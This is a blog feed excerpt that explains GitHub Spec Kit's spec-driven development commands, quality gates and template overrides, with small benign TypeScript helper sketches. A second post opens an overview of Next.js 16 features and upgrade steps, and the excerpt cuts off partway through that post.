&lt;p&gt;Spec Kit launched with three commands (&lt;code&gt;/specify&lt;/code&gt;, &lt;code&gt;/plan&lt;/code&gt;, &lt;code&gt;/tasks&lt;/code&gt;). As of 2026 they have settled into a namespaced &lt;code&gt;/speckit.*&lt;/code&gt; scheme (Codex CLI in skills mode uses &lt;code&gt;$speckit-*&lt;/code&gt;). In one line, the flow is &lt;strong&gt;Spec → Plan → Tasks → Implement&lt;/strong&gt;, with the constitution up front and quality gates (&lt;code&gt;clarify&lt;/code&gt;, &lt;code&gt;analyze&lt;/code&gt;) placed before planning and before implementation.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Core commands
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Agent skill&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.constitution&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-constitution&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Create/update governing principles and dev guidelines&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.specify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-specify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Define the what &amp;amp; why — requirements and user stories (PRD)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.plan&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-plan&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The how — implementation plan with your chosen stack/architecture&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.tasks&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-tasks&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Break the plan into an actionable task list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.taskstoissues&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-taskstoissues&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Convert tasks into GitHub issues for tracking/execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.implement&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-implement&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Execute all tasks to build the feature per the plan&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;/speckit.specify&lt;/code&gt; &lt;strong&gt;explicitly excludes technical decisions&lt;/strong&gt;: you write motivations and functional requirements, not the stack. Conversely, &lt;code&gt;/speckit.plan&lt;/code&gt; handles the "how" (frameworks, libraries, database, infrastructure) and produces extra artifacts such as research notes, data contracts, and a quickstart so teammates can start experimenting immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 4: what / why (do NOT specify the stack)&lt;/span&gt;
/speckit.specify Build an app that organizes photos into albums grouped by &lt;span class="nb"&gt;date&lt;/span&gt;,
re-orderable by drag-and-drop on the main page, no nested albums, tile-style previews per album.

&lt;span class="c"&gt;# Step 5: how (stack / architecture)&lt;/span&gt;
/speckit.plan Use Vite with minimal libraries. Prefer vanilla HTML/CSS/JS.
Images are not uploaded anywhere&lt;span class="p"&gt;;&lt;/span&gt; metadata stored &lt;span class="k"&gt;in &lt;/span&gt;&lt;span class="nb"&gt;local &lt;/span&gt;SQLite.

&lt;span class="c"&gt;# Step 6: break into tasks&lt;/span&gt;
/speckit.tasks

&lt;span class="c"&gt;# Step 7: execute implementation&lt;/span&gt;
/speckit.implement
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
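
&lt;p&gt;Because &lt;code&gt;/speckit.specify&lt;/code&gt; should stay free of stack choices, a team could add a cheap pre-check before running it. The TypeScript sketch below is hypothetical: &lt;code&gt;STACK_TERMS&lt;/code&gt; and &lt;code&gt;findStackTerms&lt;/code&gt; are illustrative names, not part of Spec Kit, and a keyword list will only ever catch the obvious cases. It reuses the two example prompts from the block above.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;// Hypothetical pre-check: flag technology choices that belong in /speckit.plan, not /speckit.specify.
// Illustrative vocabulary only; extend it with your organization's stack terms.
const STACK_TERMS: string[] = ["react", "vue", "angular", "vite", "next.js", "django", "rails", "sqlite", "postgres", "mysql", "redis", "kubernetes"];

function findStackTerms(prompt: string): string[] {
  // Split on anything that is not a letter, digit, or dot, then strip trailing dots
  // so that "Vite." or "SQLite." at the end of a sentence still match.
  const tokens = prompt.toLowerCase().split(/[^a-z0-9.]+/);
  const hits: string[] = [];
  for (const token of tokens) {
    const word = token.replace(/\.+$/, "");
    if (STACK_TERMS.indexOf(word) !== -1) {
      if (hits.indexOf(word) === -1) {
        hits.push(word);
      }
    }
  }
  return hits;
}

const specifyPrompt = "Build an app that organizes photos into albums grouped by date, re-orderable by drag-and-drop on the main page, no nested albums, tile-style previews per album.";
const planPrompt = "Use Vite with minimal libraries. Prefer vanilla HTML/CSS/JS. Images are not uploaded anywhere; metadata stored in local SQLite.";

console.log(JSON.stringify(findStackTerms(specifyPrompt))); // []
console.log(JSON.stringify(findStackTerms(planPrompt)));    // ["vite","sqlite"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;An empty result for the specify prompt and a non-empty one for the plan prompt is exactly the split the two commands are meant to enforce.&lt;/p&gt;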



&lt;h3&gt;
  
  
  4.2 Optional commands — the quality gates
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Agent skill&lt;/th&gt;
&lt;th&gt;Role / recommended timing&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.clarify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-clarify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Resolve underspecified areas via questions — before &lt;code&gt;plan&lt;/code&gt; (formerly &lt;code&gt;/quizme&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.analyze&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-analyze&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cross-artifact consistency &amp;amp; coverage — after &lt;code&gt;tasks&lt;/code&gt;, before &lt;code&gt;implement&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.checklist&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-checklist&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Generate requirement completeness/clarity checklists ("unit tests for English")&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In practice, the recommended end-to-end flow is &lt;strong&gt;constitution → specify → clarify → plan → tasks → analyze → implement&lt;/strong&gt;. Using &lt;code&gt;clarify&lt;/code&gt; to fill gaps in the spec, and &lt;code&gt;analyze&lt;/code&gt; to confirm that spec, plan, and tasks don't contradict each other, &lt;em&gt;before&lt;/em&gt; implementing is what cuts rework the most.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
  A["/speckit.constitution\nproject constitution = non-negotiables"] --&amp;gt; B["/speckit.specify\nwhat / why (PRD)"]
  B --&amp;gt; C["/speckit.clarify\nresolve ambiguity"]
  C --&amp;gt; D["/speckit.plan\nhow (stack / architecture)"]
  D --&amp;gt; E["/speckit.tasks\nactionable task breakdown"]
  E --&amp;gt; F["/speckit.analyze\nartifact consistency / coverage"]
  F --&amp;gt; G{"consistent?"}
  G --&amp;gt;|no| B
  G --&amp;gt;|yes| H["/speckit.implement\nexecute tasks -&amp;gt; code"]
  H --&amp;gt; I["verify: tests + manual review\ncompare spec vs implementation"]
  I --&amp;gt; J{"spec satisfied?"}
  J --&amp;gt;|no| C
  J --&amp;gt;|yes| K["merge / next feature branch"]
  A -. grounding .-&amp;gt; D
  A -. grounding .-&amp;gt; H
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
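
&lt;p&gt;If you want CI to enforce this order rather than rely on habit, a small gate is enough. The TypeScript sketch below is hypothetical: &lt;code&gt;PHASES&lt;/code&gt; and &lt;code&gt;missingBefore&lt;/code&gt; are illustrative names, it assumes your pipeline records which phases have already run on a feature branch, and it treats the optional &lt;code&gt;clarify&lt;/code&gt; and &lt;code&gt;analyze&lt;/code&gt; gates as mandatory.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;// Recommended end-to-end order; clarify and analyze are optional in Spec Kit but required by this policy.
const PHASES: string[] = ["constitution", "specify", "clarify", "plan", "tasks", "analyze", "implement"];

// Returns the earlier phases that have not run yet; an empty array means the target phase may proceed.
function missingBefore(target: string, completed: string[]): string[] {
  const position = PHASES.indexOf(target);
  if (position === -1) {
    throw new Error("unknown phase: " + target);
  }
  return PHASES.slice(0, position).filter(function (phase) {
    return completed.indexOf(phase) === -1;
  });
}

// Example: someone skipped clarify and analyze, so implement is blocked.
const done = ["constitution", "specify", "plan", "tasks"];
console.log(JSON.stringify(missingBefore("implement", done)));
// ["clarify","analyze"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;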



&lt;h2&gt;
  
  
  5. Extensions and presets — organizational customization
&lt;/h2&gt;

&lt;p&gt;Spec Kit can be tailored via two complementary systems — &lt;strong&gt;Extensions&lt;/strong&gt; and &lt;strong&gt;Presets&lt;/strong&gt; — plus project-local overrides. Templates are resolved at &lt;strong&gt;runtime&lt;/strong&gt;: Spec Kit walks the priority stack top-down and uses the first match.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Location&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1 (highest)&lt;/td&gt;
&lt;td&gt;Project-local overrides&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/templates/overrides/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Presets — customize core &amp;amp; extensions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/presets/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Extensions — add new capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/extensions/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 (lowest)&lt;/td&gt;
&lt;td&gt;Spec Kit Core — built-in SDD commands &amp;amp; templates&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
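
&lt;p&gt;The first-match-wins lookup is easy to model. The TypeScript sketch below mirrors the four locations in the table; &lt;code&gt;resolveTemplate&lt;/code&gt; and &lt;code&gt;PathExists&lt;/code&gt; are hypothetical names, the template file names are examples, and treating each location as a flat directory is a simplification (the real resolver may look inside per-preset or per-extension subfolders).&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;// The four locations from the priority table, highest priority first.
const TEMPLATE_SEARCH_ORDER: string[] = [
  ".specify/templates/overrides/",  // 1. project-local overrides
  ".specify/presets/templates/",    // 2. presets
  ".specify/extensions/templates/", // 3. extensions
  ".specify/templates/",            // 4. Spec Kit core
];

// Injected existence check so the sketch runs without touching the disk.
interface PathExists {
  (path: string): boolean;
}

// Walk the stack top-down and return the first match, or null if nothing provides the template.
function resolveTemplate(fileName: string, exists: PathExists): string | null {
  for (const dir of TEMPLATE_SEARCH_ORDER) {
    const candidate = dir + fileName;
    if (exists(candidate)) {
      return candidate;
    }
  }
  return null;
}

// Example: a preset customizes the plan template, so it wins over core.
const onDisk: string[] = [
  ".specify/presets/templates/plan-template.md",
  ".specify/templates/plan-template.md",
  ".specify/templates/spec-template.md",
];
function inFixture(path: string): boolean {
  return onDisk.indexOf(path) !== -1;
}
console.log(resolveTemplate("plan-template.md", inFixture)); // .specify/presets/templates/plan-template.md
console.log(resolveTemplate("spec-template.md", inFixture)); // .specify/templates/spec-template.md
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Against a real checkout you could pass Node's &lt;code&gt;fs.existsSync&lt;/code&gt; as the &lt;code&gt;exists&lt;/code&gt; argument. The first-match-wins loop is also why a file dropped into &lt;code&gt;overrides/&lt;/code&gt; silently shadows every preset and extension that ships the same template.&lt;/p&gt;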

&lt;p&gt;For integrations that support skills mode, &lt;code&gt;--integration &amp;lt;agent&amp;gt; --integration-options="--skills"&lt;/code&gt; installs agent skills instead of slash-command prompt files — so you can ship the same SDD workflow as either slash commands or skills.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Limits and operational caveats — "the spec is perfect, the code is empty"
&lt;/h2&gt;

&lt;p&gt;SDD is not a silver bullet. The issues raised most often in the comments on the official blog post map directly onto real operational risks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;False done&lt;/strong&gt;: the spec/plan/tasks docs read beautifully, the agent reports "implementation complete," yet much of the functionality is missing and there are zero tests. → Don't treat &lt;code&gt;/speckit.implement&lt;/code&gt; as a trusted finish line. Pin "every feature ships with tests" into the constitution and &lt;strong&gt;compare implementation against the spec&lt;/strong&gt; via &lt;code&gt;checklist&lt;/code&gt; and real test runs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What goes in the spec&lt;/strong&gt;: a fundamental question — "user stories, or some other form?" A more detailed first prompt dramatically improves spec quality, so be concrete about the experiences critical to success and what you explicitly &lt;em&gt;don't&lt;/em&gt; want.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-agent, multi-developer&lt;/strong&gt;: in one monorepo with devs using Cursor, Claude Code, and Gemini CLI, how do you keep a single spec? → Keep the spec outside the IDE, versioned alongside the repo. Then swapping tools still means implementing against the same contract, and the speedup comes from alignment.&lt;/li&gt;
&lt;/ul&gt;
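
&lt;p&gt;One way to make "compare implementation against the spec" mechanical is a traceability check. The TypeScript sketch below assumes requirements in &lt;code&gt;spec.md&lt;/code&gt; carry IDs such as &lt;code&gt;FR-001&lt;/code&gt; (the style Spec Kit's spec template uses; confirm in yours) and that your team convention is to mention the ID in each test's name. &lt;code&gt;requirementIds&lt;/code&gt; and &lt;code&gt;uncoveredRequirements&lt;/code&gt; are hypothetical, and a passing check only proves an ID is referenced, not that the test is meaningful.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;// Collect unique requirement IDs such as "FR-001" from the spec text, in order of first appearance.
function requirementIds(specText: string): string[] {
  const matches: string[] = specText.match(/\bFR-\d{3}\b/g) || [];
  const unique: string[] = [];
  for (const id of matches) {
    if (unique.indexOf(id) === -1) {
      unique.push(id);
    }
  }
  return unique;
}

// Return the requirement IDs that no test source mentions: candidates for a "false done".
function uncoveredRequirements(specText: string, testSources: string[]): string[] {
  const allTests = testSources.join("\n");
  return requirementIds(specText).filter(function (id) {
    return allTests.indexOf(id) === -1;
  });
}

const spec = [
  "- **FR-001**: System MUST group photos into albums by date.",
  "- **FR-002**: Users MUST be able to reorder albums by drag-and-drop.",
  "- **FR-003**: System MUST NOT allow nested albums.",
].join("\n");
const tests = ["test('FR-001 groups photos by date', ...)", "test('FR-003 rejects nested albums', ...)"];

console.log(JSON.stringify(uncoveredRequirements(spec, tests))); // ["FR-002"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;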

&lt;p&gt;In short, SDD's speed comes not from "faster typing" but from &lt;strong&gt;alignment&lt;/strong&gt; — and alignment holds only when a human reviews and approves the constitution and spec to the end.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. ManoIT internal rollout checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Prep prerequisites — uv, Python 3.11+, Git; pick a standard agent&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;specify integration list&lt;/code&gt; works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;specify init --integration &amp;lt;agent&amp;gt;&lt;/code&gt; to a PoC repo&lt;/td&gt;
&lt;td&gt;Lead eng&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;.specify/&lt;/code&gt; + agent folder created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Author a company-standard &lt;code&gt;constitution.md&lt;/code&gt; (tests, security, CLI-first)&lt;/td&gt;
&lt;td&gt;Architect&lt;/td&gt;
&lt;td&gt;Shared constitution PR merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Run specify→clarify→plan once on a representative feature&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;spec/plan/data contract produced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Mandate the &lt;code&gt;analyze&lt;/code&gt; consistency gate after &lt;code&gt;tasks&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;implement only at zero warnings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Standardize &lt;code&gt;checklist&lt;/code&gt; + real tests to prevent "false done"&lt;/td&gt;
&lt;td&gt;QA&lt;/td&gt;
&lt;td&gt;impl-vs-spec comparison report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Version specs under &lt;code&gt;specs/&lt;/code&gt; per feature branch&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;same spec reused after tool swap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Standardize internal templates via Extensions/Presets&lt;/td&gt;
&lt;td&gt;DX&lt;/td&gt;
&lt;td&gt;auto-applied on new-repo scaffolding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Wire &lt;code&gt;taskstoissues&lt;/code&gt; to link tasks ↔ GitHub issues&lt;/td&gt;
&lt;td&gt;Each team&lt;/td&gt;
&lt;td&gt;auto-loaded onto sprint board&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  8. Conclusion — "intent before code, constitution above the agent"
&lt;/h2&gt;

&lt;p&gt;In one line, GitHub Spec Kit is &lt;strong&gt;a toolkit that pins intent, plan, and principles into an executable spec &lt;em&gt;before&lt;/em&gt; code, in order to control what AI agents output.&lt;/strong&gt; The &lt;code&gt;Constitution&lt;/code&gt; turns an organization's non-negotiables into a guardrail across every step, and the staged &lt;code&gt;/speckit.specify → clarify → plan → tasks → analyze → implement&lt;/code&gt; flow separates "what/why" from "how" so each decision is reviewable. The Specify CLI bootstraps all of this across 30+ agents with near-zero config — but remember the tool itself is "not magic, just templates + scripts."&lt;/p&gt;

&lt;p&gt;Three operational recommendations to close: (1) &lt;strong&gt;Start with the constitution&lt;/strong&gt; — if you don't pin testing, security, and architecture conventions into &lt;code&gt;constitution.md&lt;/code&gt; first, you'll be left with empty implementations behind well-written specs. (2) &lt;strong&gt;Don't skip clarify and analyze&lt;/strong&gt; — resolving ambiguity and checking artifact consistency cut implementation rework the most. (3) &lt;strong&gt;Version specs like code&lt;/strong&gt; — the spec must live outside the IDE in the repo so you can collaborate against the same contract even when tools change. The shortest possible advice: &lt;em&gt;run &lt;code&gt;specify init&lt;/code&gt; on one PoC repo this sprint, write your internal constitution, and complete one full pass on a representative feature.&lt;/em&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), using the GitHub Spec Kit official docs (github.github.com/spec-kit, updated 2026-05-27), the github/spec-kit repository README (slash commands and CLI reference), the Microsoft developer blog (Den Delimarsky, 2025-09-15) and its community discussion, and SDD adoption reporting as primary sources. Command names, CLI options, directory structure, and statistics reflect official docs as of 2026-05-31; Spec Kit is explicitly an experimental project and may change. Verify the latest commands and integration status at github.com/github/spec-kit Releases before adopting in production.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481775" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>softwareengineering</category>
      <category>ai</category>
      <category>programming</category>
      <category>github</category>
    </item>
    <item>
      <title>Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware to proxy.ts, and 16.2's AI-Native DevTools</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 29 May 2026 23:52:25 +0000</pubDate>
      <link>https://dev.to/x4nent/nextjs-16-deep-dive-cache-components-with-use-cache-turbopack-as-the-default-bundler-6h0</link>
      <guid>https://dev.to/x4nent/nextjs-16-deep-dive-cache-components-with-use-cache-turbopack-as-the-default-bundler-6h0</guid>
      <description>&lt;h1&gt;
  
  
  Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware → proxy.ts, and 16.2's AI-Native DevTools Redefining the 2026 React Full-Stack Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Next.js 16 went GA on &lt;strong&gt;October 21, 2025&lt;/strong&gt;, followed by &lt;strong&gt;16.1&lt;/strong&gt; and, on March 18, 2026, &lt;strong&gt;16.2&lt;/strong&gt;; the 16.2.x patch line is current as of May 2026.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache Components&lt;/strong&gt; and the &lt;strong&gt;&lt;code&gt;"use cache"&lt;/code&gt;&lt;/strong&gt; directive flip the App Router from implicit caching to an &lt;strong&gt;explicit, opt-in&lt;/strong&gt; model — dynamic by default, cached only where you say so, with compiler-generated cache keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Turbopack is now the stable default bundler&lt;/strong&gt;: 2–5× faster production builds and up to 10× faster Fast Refresh, no config required.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;middleware.ts&lt;/code&gt; becomes &lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt; to make the request-time network boundary explicit (Node.js runtime).&lt;/li&gt;
&lt;li&gt;New caching APIs &lt;strong&gt;&lt;code&gt;revalidateTag&lt;/code&gt; / &lt;code&gt;updateTag&lt;/code&gt; / &lt;code&gt;refresh&lt;/code&gt;&lt;/strong&gt; separate SWR, read-your-writes, and uncached-refresh intents; support for &lt;strong&gt;React 19.2&lt;/strong&gt; (View Transitions, Activity, useEffectEvent) and &lt;strong&gt;React Compiler 1.0&lt;/strong&gt; is stable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;16.2&lt;/strong&gt; turns the framework AI-native: &lt;code&gt;AGENTS.md&lt;/code&gt; by default, browser log forwarding, and an experimental &lt;strong&gt;Agent DevTools&lt;/strong&gt; CLI.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Vercel shipped &lt;strong&gt;Next.js 16&lt;/strong&gt; as GA on October 21, 2025, then followed with &lt;strong&gt;16.1&lt;/strong&gt; and, on March 18, 2026, &lt;strong&gt;16.2&lt;/strong&gt;, reaching the 16.2.x patch line by May 2026. It's the endpoint of the arc that ran through 13 (App Router), 14 (Server Actions), and 15 (async APIs, Turbopack beta). In one paragraph: (1) &lt;strong&gt;Cache Components&lt;/strong&gt; and the &lt;code&gt;"use cache"&lt;/code&gt; directive end the &lt;em&gt;implicit caching&lt;/em&gt; that frustrated developers most, replacing it with an explicit opt-in model; (2) &lt;strong&gt;Turbopack is stabilized as the default bundler&lt;/strong&gt;, delivering 2–5× faster builds and up to 10× faster Fast Refresh with zero configuration; and (3) &lt;code&gt;middleware.ts&lt;/code&gt; is renamed &lt;strong&gt;&lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt; to clarify its role as a request-time proxy in front of the cache. Add (4) the &lt;code&gt;revalidateTag&lt;/code&gt;/&lt;code&gt;updateTag&lt;/code&gt;/&lt;code&gt;refresh&lt;/code&gt; caching APIs, (5) &lt;strong&gt;React 19.2&lt;/strong&gt; and &lt;strong&gt;React Compiler&lt;/strong&gt; stabilization, (6) a &lt;strong&gt;layout-deduplication / incremental-prefetch&lt;/strong&gt; routing overhaul, and (7) 16.2's &lt;strong&gt;AGENTS.md, browser log forwarding, and Agent DevTools&lt;/strong&gt;. This article examines the reason behind each change from an operations/DX standpoint and lays out the step-by-step migration, validation, and rollback playbook ManoIT applied to its internal Next.js services.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's Next.js 16 matters
&lt;/h2&gt;

&lt;p&gt;Through Next.js 15, the biggest friction in the App Router was that you couldn't predict what got cached. Default &lt;code&gt;fetch&lt;/code&gt; caching, the Full Route Cache, and the Router Cache were implicitly entangled, so unintended static optimization and stale data were frequent debugging headaches. Next.js 16 inverts that philosophy head-on (&lt;strong&gt;dynamic by default, caching is explicit opt-in&lt;/strong&gt;) while promoting Turbopack from beta to the default bundler, so fast startup and fast builds come out of the box with no configuration.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Key change&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 13&lt;/td&gt;
&lt;td&gt;2022.10&lt;/td&gt;
&lt;td&gt;App Router &amp;amp; Server Components&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 14&lt;/td&gt;
&lt;td&gt;2023.10&lt;/td&gt;
&lt;td&gt;Server Actions stable, PPR preview&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 15&lt;/td&gt;
&lt;td&gt;2024.10&lt;/td&gt;
&lt;td&gt;async params/cookies/headers, Turbopack beta, React 19&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16&lt;/td&gt;
&lt;td&gt;2025.10.21&lt;/td&gt;
&lt;td&gt;Cache Components (use cache), Turbopack stable, proxy.ts, React 19.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16.1&lt;/td&gt;
&lt;td&gt;2025.12&lt;/td&gt;
&lt;td&gt;Cache Components refinement, DX, caching-API hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16.2&lt;/td&gt;
&lt;td&gt;2026.03.18&lt;/td&gt;
&lt;td&gt;AGENTS.md by default, browser log forwarding, Agent DevTools, ~87% faster dev startup&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Upgrades start with a single codemod:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Automated upgrade codemod (recommended)&lt;/span&gt;
npx @next/codemod@canary upgrade latest

&lt;span class="c"&gt;# ...or upgrade manually&lt;/span&gt;
npm &lt;span class="nb"&gt;install &lt;/span&gt;next@latest react@latest react-dom@latest

&lt;span class="c"&gt;# ...or start fresh&lt;/span&gt;
npx create-next-app@latest
